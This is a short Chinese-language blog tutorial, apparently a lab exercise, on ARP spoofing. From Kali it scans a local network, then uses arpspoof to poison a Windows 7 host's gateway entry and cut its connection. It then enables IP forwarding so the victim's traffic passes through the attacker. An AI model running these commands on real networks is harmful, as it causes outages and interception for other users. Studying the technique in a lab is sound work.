ARP欺骗断网实战

实验环境:

攻击目标:局域网内终端

攻击机:kali(nat模式)

实战:

 先进性局域网内主机扫描

┌──(root💀kali)-[~]
└─# nmap -sn 10.10.10.0/24

┌──(root💀kali)-[~]
└─# nbtscan 10.10.10.0/24

 ┌──(root💀kali)-[~]
└─# arp-scan 10.10.10.1-10.10.10.254

 查看win7arp表

Win7中命令行持续ping 114.114.114.114 -t

 

┌──(root💀kali)-[~]
└─# arpspoof -i eth0 -t 10.10.10.132 10.10.10.2

10.10.10.132为肉鸡地址 10.10.10.2 为局域网的网关

 此时看到win7 数据包超时 ,断网成功,说明欺骗网关成功

再次查看win7的arp路由表,我们可以发现mac地址欺骗成功为肉鸡mac地址

如果想让肉鸡联网则需要开启攻击机的路由转发功能(在kali机中再新建一个标签页输入路由转发开启命令)

┌──(root💀kali)-[~]
└─# echo 1  > /proc/sys/net/ipv4/ip_forward

(向ip_forward文件修改为1则是启动网络转发功能;默认关闭为0)

此时可以看到win7可以联网

 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值